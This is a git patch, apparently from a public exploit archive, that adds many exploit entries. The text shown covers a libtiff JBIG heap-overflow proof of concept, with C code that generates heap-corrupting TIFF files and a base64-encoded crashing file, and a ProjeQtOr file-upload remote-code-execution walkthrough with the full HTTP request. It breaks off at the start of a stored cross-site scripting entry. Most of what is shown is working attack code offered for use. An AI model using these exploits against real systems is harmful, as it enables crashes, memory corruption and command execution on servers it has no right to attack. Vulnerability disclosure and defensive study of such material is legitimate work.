From 832a222df41e6c21a9fcea85ec6da08e95395cac Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 26 Oct 2018 05:01:46 +0000 Subject: [PATCH] DB: 2018-10-26 21 changes to exploits/shellcodes ServersCheck Monitoring Software 14.3.3 - Denial of Service (PoC) BORGChat 1.0.0 build 438 - Denial of Service (PoC) libtiff 4.0.9 - Decodes Arbitrarily Sized JBIG into a Target Buffer Adult Filter 1.0 - Buffer Overflow (SEH) WebEx - Local Service Permissions Exploit (Metasploit) exim 4.90 - Remote Code Execution ServersCheck Monitoring Software 14.3.3 - Arbitrary File Write exim 4.90 - Remote Code Execution WebExec - Authenticated User Code Execution (Metasploit) ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution Ekushey Project Manager CRM 3.1 - Cross-Site Scripting phptpoint Pharmacy Management System 1.0 - 'username' SQL injection phptpoint Hospital Management System 1.0 - 'user' SQL injection Simple Chat System 1.0 - 'id' SQL Injection Delta Sql 1.8.2 - Arbitrary File Upload User Management 1.1 - Cross-Site Scripting ClipBucket 2.8 - 'id' SQL Injection Simple POS and Inventory 1.0 - 'cat' SQL Injection AiOPMSD Final 1.0.0 - 'q' SQL Injection AjentiCP 1.2.23.13 - Cross-Site Scripting MPS Box 0.1.8.0 - 'uuid' SQL Injection Open STA Manager 2.3 - Arbitrary File Download --- exploits/linux/dos/45694.c | 301 +++++++++++++++++++++ exploits/php/webapps/45680.txt | 89 ++++++ exploits/php/webapps/45681.txt | 76 ++++++ exploits/php/webapps/45682.txt | 42 +++ exploits/php/webapps/45683.txt | 75 +++++ exploits/php/webapps/45684.txt | 41 +++ exploits/php/webapps/45685.txt | 71 +++++ exploits/php/webapps/45686.txt | 36 +++ exploits/php/webapps/45688.txt | 37 +++ exploits/php/webapps/45689.txt | 91 +++++++ exploits/php/webapps/45690.txt | 170 ++++++++++++ exploits/php/webapps/45691.txt | 21 ++ exploits/php/webapps/45692.txt | 47 ++++ exploits/php/webapps/45693.txt | 55 ++++ exploits/windows/local/45696.rb | 202 ++++++++++++++ exploits/windows/{dos => remote}/45658.txt | 0 exploits/windows/remote/45695.rb | 187 +++++++++++++ exploits/windows_x86-64/dos/45679.py | 35 +++ exploits/windows_x86/local/45687.txt | 55 ++++ files_exploits.csv | 22 +- 20 files changed, 1651 insertions(+), 2 deletions(-) create mode 100644 exploits/linux/dos/45694.c create mode 100644 exploits/php/webapps/45680.txt create mode 100644 exploits/php/webapps/45681.txt create mode 100644 exploits/php/webapps/45682.txt create mode 100644 exploits/php/webapps/45683.txt create mode 100644 exploits/php/webapps/45684.txt create mode 100644 exploits/php/webapps/45685.txt create mode 100644 exploits/php/webapps/45686.txt create mode 100644 exploits/php/webapps/45688.txt create mode 100644 exploits/php/webapps/45689.txt create mode 100644 exploits/php/webapps/45690.txt create mode 100644 exploits/php/webapps/45691.txt create mode 100644 exploits/php/webapps/45692.txt create mode 100644 exploits/php/webapps/45693.txt create mode 100755 exploits/windows/local/45696.rb rename exploits/windows/{dos => remote}/45658.txt (100%) create mode 100755 exploits/windows/remote/45695.rb create mode 100755 exploits/windows_x86-64/dos/45679.py create mode 100644 exploits/windows_x86/local/45687.txt diff --git a/exploits/linux/dos/45694.c b/exploits/linux/dos/45694.c new file mode 100644 index 000000000..bce0bd36b --- /dev/null +++ b/exploits/linux/dos/45694.c @@ -0,0 +1,301 @@ +/* +libtiff up to and including 4.0.9 decodes arbitrarily-sized JBIG into a buffer, ignoring the buffer size. + +The issue occurs because JBIGDecode entirely ignores the size of the buffer that is passed to it: + + +static int JBIGDecode(TIFF* tif, uint8* buffer, tmsize_t size, uint16 s) +{ + struct jbg_dec_state decoder; + int decodeStatus = 0; + unsigned char* pImage = NULL; + (void) size, (void) s; + if (isFillOrder(tif, tif->tif_dir.td_fillorder)) + { + TIFFReverseBits(tif->tif_rawdata, tif->tif_rawdatasize); + } + jbg_dec_init(&decoder); +(...) + decodeStatus = jbg_dec_in(&decoder, (unsigned char*)tif->tif_rawdata, + (size_t)tif->tif_rawdatasize, NULL); + if (JBG_EOK != decodeStatus) + { + (...) + } + pImage = jbg_dec_getimage(&decoder, 0); + _TIFFmemcpy(buffer, pImage, jbg_dec_getsize(&decoder)); + jbg_dec_free(&decoder); + return 1; +} + + +The 4th line above is apparently to silence compiler warnings; the code proceeds to decode the JBIG contents, and then blindly copies as many bytes as decoded into the target buffer by means of _TIFFmemcpy. + +The attack primitive here ends up as follows: +1) The attacker gets to perform an allocation of a size of his choosing. +2) The attacker gets to write a pretty arbitrary amount of data of his choosing into this buffer. + +Reproducing testcases can be generated using the following C code: +============================================================================= +*/ + +#include +#include +#include +#include +#include "jbig.h" + + +void output_bie(unsigned char *start, size_t len, void *file) +{ + fwrite(start, 1, len, (FILE *) file); + + return; +} + +int main(int argc, char**argv) +{ + FILE* inputfile = fopen(argv[1], "rb"); + FILE* outputfile = fopen(argv[2], "wb"); + + // Write the hacky TIF header. + unsigned char buf[] = { + 0x49, 0x49, // Identifier. + 0x2A, 0x00, // Version. + 0xCA, 0x03, 0x00, 0x00, // First IFD offset. + 0x32, 0x30, 0x30, 0x31, + 0x3a, 0x31, 0x31, 0x3a, + 0x32, 0x37, 0x20, 0x32, + 0x31, 0x3a, 0x34, 0x30, + 0x3a, 0x32, 0x38, 0x00, + 0x38, 0x00, 0x00, 0x00, + 0x01, 0x00, 0x00, 0x00, + 0x38, 0x00, 0x00, 0x00, + 0x00, 0x01, 0x00, 0x00 + }; + fwrite(&(buf[0]), sizeof(buf), 1, outputfile); + + // Read the inputfile. + struct stat st; + stat(argv[1], &st); + size_t size = st.st_size; + unsigned char* data = malloc(size); + fread(data, size, 1, inputfile); + + // Calculate how many "pixels" we have in the input. + unsigned char *bitmaps[1] = { data }; + struct jbg_enc_state se; + + jbg_enc_init(&se, size * 8, 1, 1, bitmaps, output_bie, outputfile); + jbg_enc_out(&se); + jbg_enc_free(&se); + + // The raw JBIG data has been written, now write the IFDs for the TIF file. + unsigned char ifds[] = { + 0x0E, 0x00, // Number of entries. +0 + + 0xFE, 0x00, // Subfile type. +2 + 0x04, 0x00, // Datatype: LONG. +6 + 0x01, 0x00, 0x00, 0x00, // 1 element. +10 + 0x00, 0x00, 0x00, 0x00, // 0 +14 + 0x00, 0x01, // IMAGE_WIDTH +16 + 0x03, 0x00, // Datatype: SHORT. +18 + 0x01, 0x00, 0x00, 0x00, // 1 element. +22 + 0x96, 0x00, 0x00, 0x00, // 96 hex width. +26 + 0x01, 0x01, // IMAGE_LENGTH +28 + 0x03, 0x00, // SHORT +30 + 0x01, 0x00, 0x00, 0x00, // 1 element +34 + 0x96, 0x00, 0x00, 0x00, // 96 hex length. +38 + 0x02, 0x01, // BITS_PER_SAMPLE +40 + 0x03, 0x00, // SHORT +42 + 0x01, 0x00, 0x00, 0x00, // 1 element +46 + 0x01, 0x00, 0x00, 0x00, // 1 +50 + 0x03, 0x01, // COMPRESSION +52 + 0x03, 0x00, // SHORT +54 + 0x01, 0x00, 0x00, 0x00, // 1 element +58 + 0x65, 0x87, 0x00, 0x00, // JBIG +62 + 0x06, 0x01, // PHOTOMETRIC +64 + 0x03, 0x00, // SHORT +66 + 0x01, 0x00, 0x00, 0x00, // 1 element +70 + 0x00, 0x00, 0x00, 0x00, // / +74 + 0x11, 0x01, // STRIP_OFFSETS +78 + 0x04, 0x00, // LONG +80 + 0x13, 0x00, 0x00, 0x00, // 0x13 elements +82 + 0x2C, 0x00, 0x00, 0x00, // Offset 2C in file +86 + 0x15, 0x01, // SAMPLES_PER_PIXEL +90 + 0x03, 0x00, // SHORT +92 + 0x01, 0x00, 0x00, 0x00, // 1 element +94 + 0x01, 0x00, 0x00, 0x00, // 1 +98 + 0x16, 0x01, // ROWS_PER_STRIP +102 + 0x04, 0x00, // LONG +104 + 0x01, 0x00, 0x00, 0x00, // 1 element +106 + 0xFF, 0xFF, 0xFF, 0xFF, // Invalid +110 + 0x17, 0x01, // STRIP_BYTE_COUNTS +114 + 0x04, 0x00, // LONG +116 + 0x13, 0x00, 0x00, 0x00, // 0x13 elements +118 + 0xC5, 0xC0, 0x00, 0x00, // Read 0xC0C5 bytes for the strip? +122 + 0x1A, 0x01, // X_RESOLUTION + 0x05, 0x00, // RATIONAL + 0x01, 0x00, 0x00, 0x00, // 1 element + 0x1C, 0x00, 0x00, 0x00, + 0x1B, 0x01, // Y_RESOLUTION + 0x05, 0x00, // RATIONAL + 0x01, 0x00, 0x00, 0x00, // 1 Element + 0x24, 0x00, 0x00, 0x00, + 0x28, 0x01, // RESOLUTION_UNIT + 0x03, 0x00, // SHORT + 0x01, 0x00, 0x00, 0x00, // 1 Element + 0x02, 0x00, 0x00, 0x00, // 2 + 0x0A, 0x01, // FILL_ORDER + 0x03, 0x00, // SHORT + 0x01, 0x00, 0x00, 0x00, // 1 Element + 0x02, 0x00, 0x00, 0x00, // Bit order inverted. + 0x00, 0x00, 0x00, 0x00 }; + + // Adjust the offset for the IFDs. + uint32_t ifd_offset = ftell(outputfile); + fwrite(&(ifds[0]), sizeof(ifds), 1, outputfile); + fseek(outputfile, 4, SEEK_SET); + fwrite(&ifd_offset, sizeof(ifd_offset), 1, outputfile); + + // Adjust the strip size properly. + fseek(outputfile, ifd_offset + 118, SEEK_SET); + fwrite(&ifd_offset, sizeof(ifd_offset), 1, outputfile); + + fclose(outputfile); + fclose(inputfile); + return 0; +} + +/* +=============================================================== +Build & link with -ljbig. + +You can then create a new TIFF file that corrupts the heap by doing +./a.out file_with_data_to_clobber_the_heap_with.txt outputfile.tiff + +An example TIFF file that crashes various tiff readers is base64-encoded +below: + +SUkqAEgYAAAyMDAxOjExOjI3IDIxOjQwOjI4ADgAAAABAAAAOAAAAAABAAAAAAEAAAC8uAAAAAEA +AAACCAADHNKk0nHy6CbJhVojbsYUZY8vZ+LcRHKCtFjvAcJJY+JibZEZudFeppijmo6K5rQICnd4 +Z1zp2bHgMe0JNyzpKY6w/wA4FRbBmV1c+nqZnTk5lH4pnM2x38kR5widHbZSZofrR/RrOxrBrEAR +Ch8ElW2dRwbu3s84jVJkaHSGLNBrA2vtCCKGwuZhkCKq+Uy/Lwov48I7uQoXOsif0xAemOgQv47v +wgwL0yKYY5e+Qp0mCG4kIMXh/Hl6WqiKVJ2vgds8WQuvGXWFLcRdDY7GQ3AIgcMm7s/YpHXeec/2 +t3xPPnrYtI/NOMJU/pTZSY2oHKqDbjN5iTdjqEtkj5xKXL6jq1NSeFYIKaPn0LLJSXj+oagzRkia +PmlovyFoddyMpEfBclvJvj7RQ2IN/wAnOptUPR8XJ90XVJvuhjIXEovbo3Aq2QIp5GXnmDUSFolu +qIhWaE6adyhyYV0WUXurfIuez7denhEUhAAJXSvBWuM1M5+3fjbQPepOVvgvW56qMIMcbLa4hAWe +jFABZ5x6PDHtbK5O3nCEwOUbIENNDoFEw7AyqfWQo1isx8/XSP3FU6ohtin8QLiM72QJfi6rrL+Y +VsjYhewva2thqgNjQOpf9xroMyIYStnBzYKPPI3QkM0/bTs/n+4DwLruIy56PxKHOos+e4lfvNls +fuzWZ4N/tP8AzcHanc6NdhyLKieoRAFY3bQP3TXaMeg2dYNrkxy5VeLSp2AHBGnOaBKRgknB3XvT +dF2vICjoqVxfBLDt2ApOxLQ6yyL+dKhlP0NkKj5yReF1loqsm29o02F5GxJuJTUhygxhd7rFNSQS +nHgkmhrf33LCKJ5Pnsmv/EVPCFWg+vHkyPr6wOJ84tFTbfkDl/DzAcoMzbINNaMAq5LsulsCNTRi +yKBZKmhtzBRG/N0tVJfd6dhab0nNAiaCLXg0O2PBARweKgc0ySsG/wACT0pmzzUn1l8qDjNfeqfc +vJhwGdQwTu/Q82Sfoe09I+PQhGPzBP4Ui/JATeD/AK+LrSv41eOzB6RzTVMSoNPvlR1f0AmZWQHm +/wABj9+dyrVbdSWWrSiSVNJBHw8v9b03ucHRS+U5qW2hV643Pni88WlAYwxNBTGYsLvA6ORRTAzn +Vcqpw4kKx3sY8OVtmgHEyLyrj0qvmKi333ldlWHNLAN2jGC2lJkWEOKxL1136vg0B+xyMntk67aq +E9w5G4jvcPBpy1vP3NQRfncK0rCHLVpw0ruzxZm1XT+iYCsfphrfxjAhrhIavs7wWJbZpxvrzr6j +o3sNEbMzgrMtWKvSWL/Ce2/B4yXbVW52fBcfH+tAldIHu9ImMJKaFBCbtQdDerH9m+VIykWgt9Nt +NP1EZEZY2Oao7qEXzeqhHfnbR2VAbfE/zun4RgkRv6OvrCyujWyQonoN21HSjQ8TFnBiP2l52pEt +kD7i3DesQxvR0q1/z8YTpUM48Uh7QLtlBd8ZcZ23tU2u5wbbd/LCKyvshdItjkCPkP4I0yxWoJSM +x6M/2O1ELpcWgO/8FYzEANd4B6zhhTc5P46MN+iGlzAIE0i4NvijCc6WWBJ+ZdRVwnxr+qAOVyI5 +/GOVlAfd8G7c9GJvID5xTn3BZszdg/Y3v2lo0E91IrdcCprS1nsN+s9NcmvO2p5V4zIjQ4XdTGLA +NsovmUJ8B/SF3WSO/PXsiLIqCSDS2ayzduYEfDdkFe4BbNlM4oIxwFRbbiTCg5aBloyjwfpkfoIZ +qiceTmxyG3uK5HXiLpz13geBblUtEGKiLgHYNM8PyExld5bhpSui3pcv/O+qDrmjjZ0YM/8ANeJ0 +ARrmF6Otlz712yK+IRT/AD8MhbSNL0jOtNa9l/grfyIULPk9/wAP1iVlRgpDv94lrKwronGlCkXG +aSqW/IwNdcaKi8iGfRm/F2bMJjud7iRyzf3j0n/3s/f323Oi84lNC6r+qxE8ji+/ihR1bic/5igt +AqVXn1ku3n6Y9rDBzowW6lgQ4n+h4TpWa7vw0lKFi77a5WoK3DDANNjeAZKtBz1VmqIqgXy+8+T0 +KmZ0C7VqnM9BcV8cq3k7Yj71hevxtK3D2qFb99zJ0pNg3S1Xg+r0mwwaXbvDaY86lg//APTUdGef +x+2avcTIE5/TSGqMiZzF3lYNQez6vSBD5AGwUxbCRPwCD942V7N7CsvSlqvT7yzedb1UMhDYuT+D +1MxcRckTry9Mu1P1upRlLPfDcOw0vvE47oVjloZU0G2jOf1p91/22xT9XqJFfmegbAg/o8LIP2s3 +W5t3EjOQpeQOf+pxS11t7XVFhyRLSdYoSlPU0nwxYSX3wGtWUePyRRRcAStntqqYhY3VOspIPJ5O +JNm8pMhT6nI3ifSL0rosYcqvr9lZ5vr5gPirTmNvTrhi20Rbf1IYHiUtjScYZkEiN1vP1AjBoxBo +Epp1rYRu+okT0K5q2vV5dE4nsVhlq77TAW0bmdRiDk0uT+T9MGy5e0NPdeQ80y6hf/RajnCqfSv3 +pD7YiSk0G7OqC7IIfpgwwKXYh/vYTGuGRHyEziEVkHxgC2rythPH6GejtQ6L7Wg5lMgIa10+IBGT +yyCtNSC1nnBDrSA+ikWuDj7rpVLqC3RAkiOlyAfrJpgkz1sW22qOKWkUUegUPnbUnC6i4r5QxC5G +qNieFJu9FTRLowBQJoWz9p00JQQLd72BoLlAwUMOxOcOvxeHtwj2o8EQHELUl2aioBbC5EKuQ3Mw +6BYl2h/2Do7bISj8fR94jnbLKoWzZsKn9D/kvZjYpIP/AAE32BVQChGaZECByOlgUXorZ3tpTuvl +ZnJO0i1+n5fckb1emBIuZ8olBMAFUwlGucKAJBlUWJ8e0MOaYStuz0RSYc0YvFPJpeLWmGaIAX22 +onBSpR/4fCBLUBYfkSs29hGJJ9g0BankHRcZyzabvNTR2xLn3qCTZ58LH76DLWPQoe5kAlvFELI7 +8wIiE3r8VTqx/bJQG0so5h5mDjDkiCard8+uK48p+9BbqnPPvxcYJz/+IW98g3j1IxvS/nfHLuY6 +hvmUoqs9ihLdTOp/EnDNf9KiLDom5I5bUINPbT5SJEesMZ+fJIzfwTyYrypGfB0wDmJrnEWrQ63I +AC99X9uev8BDa6ccZ7tneVRLWkH8itCB7/Yq9kfIfkx51o+ttG8Gz6/HcyVgWWBJW58EwYdlCSIw +8VAi6UBNJHCU6NCCoGdD80QYNn8RfWFOzp5hiwR90cz1RWfB6YDkscBy1W+4x6qR1Fsb/D7e6kyE +NyDq1ex3PbBatsE7ovONE+LTEK7cXm4JMWztCbg8M8wB1TBtInhe9j4GwZ3v8d4bWHV+SsXil2P9 +crvn116Yh1gzyO2sF5UCNpMP/BK/92OLVhKZKllwuB4NoNqjZZ4HZrgJ7Qul7ibytiIWcfZsXaCY +aTJBbi9jPUsiwRi0jGi9wy9TTaLAXML7zOD8igK8wVk28SDDwQSTAecGUvu0rtmUas4qbp6jiM0+ +OPCYirtjQAB3tEc1vi7ikB1c1qvRWNKIHbXJBLCu06KgJTvWVPImFGmld3A80rA+kt5xuEPf1qHQ +SH4nS87HT+aochxDU8QN6/LDZIAmT/13gSMzbigzmRainSLVbFGDSxoSfjr983ZDq6TED7Fh2rB4 +aaYss5/lTsJDU32eMZk8mRj1IZso/JQvncYoB2HuN0+YSi8pzMFTrn9Bv8NWLs3ISWO4EtQ3X7dV +YogVqJY6Km5/vbDbL1k3PkNz5SgkV1iEfGIv6dXcRYfeSij5Cn2/BCwDOnI+jdVQg5qlTm11A+R8 +EFVahnc0/wCOhnuQg77VCrecfV7yhczlu8ktDDn1DfFT7I9jCOUUOjG799GO9c6uC8wkNHpV7Y5N +x2KAvkUL5J5UvdmJUafEM9shy73tS4o/whdEiJ/W2sGuQ/Qbt1DXEAq5NZ2CtK/iqbLDL8fhpMOh +UzBWern5we/1CWgmI5DzDVNcQ7VgZ9PJhSNz/Q19Fr4Zfk7VD/jt642ovhNwo8m+Gy51c2UTYQsL +laM/p+7H794Fpn7ys1vFrhOGvdx0mmM/NRKSYJRFzPxno3Kw5hx9xAaKQBnvltJxqGO4QyrUAnFI +nGl+HI7h2IaTPmKNTUifP6HYJLlp77px239Gomg3kQpInFSzLbX7GsNMp0FFQEHHB9US25jMs8G8 +BIp8t7W2jrcvu9gbjBcXbRwQcOJVb3YcKpeJKCtd22tciBx7/PMn0hbRPOt11rwBSHU+9DCk1NKD +Oies8MuJF8b5SOMSj01ZyOCI+J7saSZ++YHd9sBoFuE5c5cYFJpHDoEYPgOPAktO/LLvP/uW1oJp +ZES1cHDqTRToIfhijn4vcHrwyX0nwDEEFq9OlvX8ykp21wecLevXyb/PzT4d/V16uzzLbc1r8brg +90RGw8gG/eym+OalhT+On1YdwBVoDTXCFLEHkU8UJUZ7Y0Dm5FFCewxYMwNQNql2McCwe+dmuLV0 +C0U93ywi7nJQkpgMlmzn2h4KGIaLx1erc9EvUJtCXtCX/G2T7+IU/wAo8Plb/PUsP3J3gctCDDv8 +AoCOi+hqc57uLsfh7OhE+7vs/wDQiBnHOEQvV6RmZVyV37oomah+MAzW0jvCilzpJaO66GPnPkV0 +YeJqIIBlNCQ7AqHuWP3GgmrJlvPzVdDHGxlcb4SDNgkVgHfV9nG2c6pUKuJqALzSwTo4iw7EUY4V +B6tMS4WvWbFRfBucYGp+DWRg4/6JNo+ee4sJEsl+fo37Dlfp98sQ9GR+gHeJgnwt0ffL7rR+fzVg +vxqhbvjpKLXi1vhhID8gCBZNcCBmvqo/v9FSrGUmCyHGiuutS0gXxB+KCdQJio2fGiun5MPIyXzG +vEMGBkhbTUWwrgjJdi92ef1Tj+U2KX41fq0K+bJNkc7lfk3qxDIZ6/QNKetMpQjBNVauEctCiHQI +KrthmPpqbZsiFArHUd3n8mRk+UhUfahylVgMxSs0AMYxw2yixt+UJDqr/wCOxfgKxIRwMsm11xAW +Bj8ufi9LBrR420DmrF67qtzrVEdWyNcCIbYmnEAWQ1qvBatOkOcKXdXEOCwYVe4N5T0lHVeVBr8A +tt7cvG/NhFn8ZbCTXam+ahRaZdlSnqsC8S2P6NATpRZL6DgcyMjbqDH/AKZqVFLChCKJXNVbGBRU +/TQhCGEJhIpDXraYSJvPCIJfJD7BERyHcnTmSvraS7/jrNKon7O/JVpQK7UqPpHjKc3tsQ0VzvFc +5PfKkMktDIA47USg0zXstwgLbf8AYN4Oqp+WciRVlVlrWGalXgxTRcjuNk0/YnlgIc5w3iku323s +eMXQfagJuZfq1VUjEJwUwK9NuKxml1guWOtsljo/KOT2hLw3otKXS4e5osxT3qCM4tRF2U2cM21r +Gvc/mzmZlxv43nylL2LlWbybHirycm7hUqKWFCEUSuaq2MCip+mhCEMITCRSGvW0wkTeeEQS+SH2 +CIjkO5OnMlfW0l3/AB1mlUT9nfkq0oFdqVH0jxlOb22IaK53iucnvlSGSWhkAcdqJQaZr2W4QFtv ++wbwdVT8s5EirKrLWsM1KvBimjQD+vCZhLSB6LGPvZ+JcVvrtrZhLaDxI4wVmlHJnSsbO0+shOzQ +blkTuUq+mdoElouiQrUY0y9Mbib7XBc80MZFHkSzhODguYOXxib+C1J3tXS2UqwFL2Lb0WNgRIvX +pdwJMtQ21BBd1+zj/Y6YLlz/ABGSTPOevuDeDwVG6xeWSjbBx55p96w50DjA4TOYtOXmFum5e8Lb +94RpNmIxfmQ82VRZvF8cRX/jiQUbf59jhCgMqnj8Rqy0XZo1kn2h7R+o8wKOcoI1s+AwSlrqex6v +6fn3JnKFH0R06d1RxqDKtKipvulzAFlsPIKOT8RNNWFqEWOaGzzG/LBujHV23HXFj8aylDRlFERa +TcfPDDbAb9zXaL8vFJzOzq8jR5cPYvVPrOTf1DF2EdbG+VdygoUhS6X59VUbutuG6TWxVtPKq36T +s2Ic5i45SJMaS1SGf0X6euXq5MABeE8+ORDLI5Ffb+pCWZlJlR4jBOl5+Eh/AOzV54ZI2xyV70df +ePhp2JmPZQpdzzYpHkHttes1pXDyd88Xp9YCDKhLa0ZodKGAXJvhW3Mtyr35xF+5aLOhxHKRqtPs +ycmxVHKjaiLnJ9hAFgIQ5lNaydxzr1nk15s5jK6m2a/f5HgONfpfBK8YXcn5uxCUGX8IDLM8J54O +T90QUMtVpiTGbmJqyyoQIgQEjOuwG94eJSbrVX/oSsObgW9OStI6HEPEC7IYSAERACJn8XM23U9N +5lAdrvA/UqTRPuNazkMYig5jNfFsJ+su5FHXtewOScgpKaGESdLx6bqmpF5RwYp0EiMVLVN2xwrh +l5RDl1iCq1oazO9Sw6vQTzHR4r31oxQa0bTgO9TiYOU2Hf0jUb+UxTq19QORGlb0XQZPIpxmaymC +yDfUg6n9BVgsDbVfo7a69/fugku0E3IibrQUNoluNLd0wRpn2jyoXxZtLneNF6xbYCxnkJyPle/6 +vovpmIWDOsb4VSxTWQKhsHWAolVkIyXMoOfdhbdsJr2WmwRUtE2RXGeU2xsm2HyeqgkNCrYCwbSf +JYZmu8lP9mtzlDNmsrDG4GqeQZlWwYPU++t9ynTpoDMPQ101U+Kx5W0eCdaGaA6HKn+7sCCB55R8 +pmcjIE5FGkrN2Fh4o964x7tY2RSmxQ96QYlPRk55hxWfgBQqlrrGkcxl81bVx52v6TIl6xgZzwPe +LO6ddxg8t/XhAUznHlfE0FvmFeOAGx89wWru6yzD2zlY6ZRAq4+9/IAQMXvutHx7WOU2mcmkMntO +Hyr86CMpKwNjC9u37aeyNSdBA+9gWhMzS2cf6gU7yMspLYVZH68DdRRaktZfKgU8lYAy2TeViu/Z +Q5NxvcrxjKIx34w7uOPn7B1hjuSsf0pMcRBrZqULbshKodDFC2mpJ4Mmg4H6v5rZSvijoDd9dXfO +tolWE9A4frx1n/6Qpb5eehOjtmTF+IefEfp/wSPpoVy1MtCaoGDBaB/N2EzhypfyRjRqCje2yTk4 +rP5/KTUgNQ4NC13VQMHfMdUatAcSm6eH8kR+t+u23h4TLWxYbFkLvkaFk+VHyJEF2M+ncOf4IwaY +W5+WFwuIOGMfRWOf3j31x2bD1MA+6Kt49dgJpeR/LhIKjmIe06e11fhuEjau63WapFiaxdeFGlaf +9E5hmyUyjK+6FAUdK0xwck/jMKh8nO7N1uYvtF1Yt9ur1fw6xrckEjzxaeTbBTe1dZL36SZLDWyA +zX9sdWLW0OpTlPtX5OxUbZhh6eaixMEPfhzsN5EvbY6Q7y8wwRkhwMJSRsBAOUR1be1m/Am9pGKb +ak5VyMPW/pZgCVUHB0tr0s+gZ6yD21UPhlTgy3nr0r2US/RINOOJSbd+frFnY11WRyFxn4j2hJ0c +avxqai83sAJkHldsnb7tTKn+eeRZ+bmr46lPoyuJOfq+v0M9jJkxae7CcVOLLuF4knzJjbKD/W2A +29zVBLo0Eh+DT8C1LoCw1F3VL9Utlmu9xiVUSlDqgXzBf8LgViPrgvhB252lOekyeeYbdCFQzlov +RXH9UWj1GH1k+UePoCbQqViYLnrf2nUKGxjoH7AAI3pt3H0BcLC/HZnxyZPExXdl4k42FgruF348 +eAvHLWZEJpEI6MOu/wAsl2XwTYeeTIZLnb8ak4v3UyQzSDZ/V46S9ZyfuDKjvxHxCK3ToV8OVtPl +DB//ABW54Eo4LkQyTmA7FR+29vA+VltMF4juDz6v0gLDh2n2IlkKZCSXHdtDaaue3cqq2dDh2ro8 +yEwSX72H1HArecrBEPT3UDmM+F0oPmO0hY41tw4UYrfW33VWEuKheKFcuAgFn9MjQ1LVTfaVJTDG +hPIDO9Vurw3QCuRNSOXDncQiHon/ACZg0Xc85h2jxMtIVXnEg7ckSf2lYV/6TwbAWCjM0nZOOwrQ +mL0/H7rCJYnVpX0lX7WTIABYlILV3GEROLL1QEql93WXJOe7AZYdN2YRbrkLdEV5zgNhes42EaZR +E+3J+6tilomP3P8AZ/8ALmTdVBkMKxOjWpug/LV4Ko8RkewEdAhZ3TtBOKzK1Zr3+HTbzegoGDFR +BYdsDJGVbCbWYgaaykeC64zqDiqZMejUivyBR5UXwPt0qg1h9n4QndvxbGfnlLEjn8IU6Z3tDzvu +UP8CDgD+AAQAAQAAAAAAAAAAAQMAAQAAAJYAAAABAQMAAQAAAJYAAAACAQMAAQAAAAEAAAADAQMA +AQAAAGWHAAAGAQMAAQAAAAAAAAARAQQAEwAAACwAAAAVAQMAAQAAAAEAAAAWAQQAAQAAAP////8X +AQQAEwAAAEgYAAAaAQUAAQAAABwAAAAbAQUAAQAAACQAAAAoAQMAAQAAAAIAAAAKAQMAAQAAAAIA +AAAAAAAA + +Labels: +Vendor-libtiff +Product-libtiff +Severity-High +Methodology-source-review (e.g. Methodology-source-review) +Finder-thomasdullien +Reported-2018-Oct-13 +*/ \ No newline at end of file diff --git a/exploits/php/webapps/45680.txt b/exploits/php/webapps/45680.txt new file mode 100644 index 000000000..bc76768f7 --- /dev/null +++ b/exploits/php/webapps/45680.txt @@ -0,0 +1,89 @@ +# Exploit Title: ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution +# Date: 2018-10-22 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Contact: https://pentest.com.tr +# Vendor Homepage: https://www.projeqtor.org +# Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV7.2.5.zip/download +# Version: v7.2.5 +# Category: Webapps +# Tested on: XAMPP for Linux 7.2.8-0 +# Description : ProjeQtOr PMT 7.2.5 and lower versions allows to upload arbitrary "shtml" files which +# leads to a remote command execution on the remote server. + +# 1) Create a file with the below HTML code and save it as .shtml + + + + + + +# 2) Login to ProjeQtOr portal as priviliage user +# 3) You can perform this operation in the ckeditor fields. +# 4) Click (Image) button on Content panel. +# 5) Chose Upload section and browse your .shtml file. +# 6) Click "Send it to Server". Script will give you "This file is not a valid image." error. +# But it will send the file to the server. Just we need to find the file. +# 7) We can read how the uploaded files are named in the +# "/tool/uploadImage.php" file.(line 90) + +id.'_'.$uploadedFile['name']; +?> + +# 8) The name of our file should be; + +Y = Years, numeric, at least 2 digits with leading 0 +m = Months, numeric +d = Days, numeric +H = Hours, numeric, at least 2 digits with leading 0 +i = Minutes, numeric +s = Seconds, numeric + +# We must save the date and time of the upload moment. + +Formula : Y+m+d+H+i+s+_+UserID+_+filename = uploaded file name + +# For Example; If you uploaded a file called "RCE.shtml" on 2018.10.23 at 01:02:30 +# the file name will be "20181023010230_1_RCE.shtml" + +# 9) Finaly all uploaded images are sent under the "/files/images/" folder. +# 10) Verift the exploit: http://domain/files/images/20181023010230_1_RCE.shtml?whoami + +The request: + +POST +/tool/uploadImage.php?CKEditor=result&CKEditorFuncNum=80&langCode=en +HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/view/main.php +Cookie: projeqtor=cd3d5cf676e8598e742925cfd2343696; +ckCsrfToken=7o1qC0Wtz7Z5QjiZ8cFuzc6yjnWdLjiHMeTalZ6n; +PHPSESSID=bc0a9f0a918ccf0deae6de127d9b73e0 +Connection: keep-alive +Content-Type: multipart/form-data; +boundary=---------------------------1783728277808111921873701375 +Content-Length: 550 +-----------------------------1783728277808111921873701375 +Content-Disposition: form-data; name="upload"; filename="RCE.shtml" +Content-Type: text/html + +[shtml file content] +-----------------------------1783728277808111921873701375 +Content-Disposition: form-data; name="ckCsrfToken" + +7o1qC0Wtz7Z5QjiZ8cFuzc6yjnWdLjiHMeTalZ6n +-----------------------------1783728277808111921873701375-- + +HTTP/1.1 200 OK +Date: Mon, 23 Oct 2018 01:02:30 GMT \ No newline at end of file diff --git a/exploits/php/webapps/45681.txt b/exploits/php/webapps/45681.txt new file mode 100644 index 000000000..c663846c8 --- /dev/null +++ b/exploits/php/webapps/45681.txt @@ -0,0 +1,76 @@ +# Exploit Title: Ekushey Project Manager CRM 3.1 - Cross-Site Scripting +# Date: 2018-10-16 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: http://creativeitem.com/ +# Software Link : http://creativeitem.com/demo/ekushey/ +# Software : Ekushey Project Manager CRM +# Version : 3.1 +# Vulernability Type : Cross-site Scripting +# Vulenrability : Stored XSS +# CVE : 